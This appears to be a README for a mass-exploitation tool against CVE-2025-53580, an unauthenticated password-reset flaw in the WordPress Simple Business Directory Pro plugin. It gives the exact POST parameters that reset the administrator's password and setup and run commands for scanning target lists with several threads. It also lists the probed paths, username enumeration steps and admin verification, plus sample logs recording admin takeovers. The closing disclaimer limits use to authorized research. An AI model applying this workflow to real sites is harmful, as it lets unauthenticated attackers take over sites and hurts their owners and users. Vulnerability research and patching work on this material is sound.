
WordPress Simple Business Directory Pro Plugin < 15.6.9 is vulnerable to a high priority Privilege Escalation
WordPress Simple Business Directory Pro Plugin < 15.6.9 is vulnerable to a high priority Privilege Escalation
___ _ ___ __ __ __ ____ ____ ___ ____ __ __
/ (_)(_| |_// (_) / )/ \/ )| | / \| / \ / \
| | | \__ /| | / |___ |___ __/|___ \__/| |
| | | / -----/ | |/ \----- \ \ \/ \| |
\___/ \_/ \___/ /___\__//___\___/ \___/\___/\___/\__/ \__/
Root Cause:
The plugin exposes a frontend password restore form (qcpd-restore-pwd) that accepts a numeric qcpd-uid (WordPress user ID) and a new pass value. No authentication, token, nonce, or email verification is enforced before the password is changed. Any unauthenticated attacker can reset the password of user ID 1 (typically the site administrator) and any other user by submitting a single POST request, then authenticate with the injected password to gain full admin access.
┌─────────────────────────────────────────────────────────────────┐
│ 1. Discover SBD restore page │
│ Probe 24 candidate paths → match body containing "sbd" │
│ │
│ 2. Reset passwords by user ID │
│ POST <restore_url> │
│ qcpd-restore-pwd = restore │
│ qcpd-restore-pwd-type = user │
│ qcpd-uid = 1 (then 2, then 3) │
│ pass = NxploitedNX │
│ │
│ 3. Enumerate usernames │
│ /?author=1..9 → redirect / body parse │
│ /wp-json/wp/v2/users → slug / username fields │
│ hostname heuristic + "admin" fallback │
│ │
│ 4. Login with injected password │
│ POST /wp-login.php log=<user> pwd=NxploitedNX │
│ Check: wordpress_logged_in cookie present │
│ │
│ 5. Verify admin access (dual method) │
│ GET /wp-json/wp/v2/users/me → capabilities.manage_options│
│ GET /wp-admin/users.php → adminmenu / users table │
│ │
│ 6. Write confirmed hit → Nx_sbd_login_hits.txt │
└─────────────────────────────────────────────────────────────────┘
git clone https://github.com/Nxploited/CVE-2025-53580.git
cd CVE-2025-53580
pip install -r requirements.txt
requirements.txt
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6
python3 CVE-2025-53580.py
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [3]: 5
HTTP timeout (seconds) [10]: 10
Successful hits file [Nx_sbd_login_hits.txt]: Nx_sbd_login_hits.txt
Password injected for all reset attempts is fixed internally:
NxploitedNX
User IDs targeted per site:
1,2,3(configurable viaMAX_USER_ID)
list.txthttps://target1.com
target2.com
http://target3.com
The tool scans 24 paths per target looking for a page whose body contains sbd:
/login /log-in /signin /sign-in
/user-login /account/login /restore /password-reset
/reset-password /lost-password /lostpassword /user/restore
/my-account /members/login /member-login /customer-login
/wp-login.php /blog/login /auth/login /auth/restore
/sbd-login /sbd-restore /blog/log-in /account/log-in
Every successful login is verified through two independent checks before being written to disk:
Method 1 — REST API:
GET /wp-json/wp/v2/users/me
→ capabilities.manage_options = true → ADMIN CONFIRMED
Method 2 — Dashboard:
GET /wp-admin/users.php
→ adminmenu / users table markers present → ADMIN CONFIRMED
Nx_sbd_login_hits.txt
[2025-06-01 14:22:10] https://target.com - type=ADMIN - user=admin
- login=/wp-login.php user=admin pass=NxploitedNX
- detail=ADMIN_CONFIRMED_REST(manage_options)
[2025-06-01 14:23:05] https://target2.com - type=USER - user=editor
- login=/wp-login.php user=editor pass=NxploitedNX
- detail=not_admin(rest_no_manage_options, wpadmin_no_strong_markers)
[info] https://target.com :: starting
[ok] https://target.com :: found front-end sbd page at https://target.com/my-account
[info] https://target.com :: starting qcpd-uid=1..3 brute with pass=NxploitedNX
[info] https://target.com :: POST uid=1 → status=302, Location=/my-account/?restored=1
[info] https://target.com :: POST uid=2 → status=302, Location=/my-account/?restored=1
[info] https://target.com :: extracting usernames and trying login
[ok] https://target.com :: login OK for user='admin', checking admin...
[ok] https://target.com :: HIT for user='admin' → admin=True,
detail=ADMIN_CONFIRMED_REST(manage_options)
[warn] https://target2.com :: no sbd page found in candidate restore paths, skipping
Nxploited (Khaled Alenazi)
GitHub → https://github.com/Nxploited
Telegram → @KNxploited
FOR AUTHORIZED SECURITY RESEARCH AND EDUCATION ONLY.
The author bears no responsibility for use against systems
the operator does not own or have explicit written permission to test.
Unauthorized use violates the CFAA, CMA, and equivalent laws worldwide.
You alone are responsible for your actions.
© 2025 Nxploited · Simple Business Directory Pro < 15.6.9 · Fixed in 15.6.9
| Field | Detail |
|---|
| CVE | CVE-2025-53580 |
| Plugin | quantumcloud Simple Business Directory Pro (simple-business-directory-pro) |
| Affected | All versions < 15.6.9 |
| Auth | None required |
| Type | Incorrect Privilege Assignment → Unauthenticated Password Reset |
| CWE | CWE-266 · Incorrect Privilege Assignment |
| Method | Endpoint |
|---|
| Author redirect | /?author=1 → /?author=9 |
| REST API | /wp-json/wp/v2/users → slug + username |
| Hostname heuristic | First label of domain |
| Hardcoded fallback | admin always included |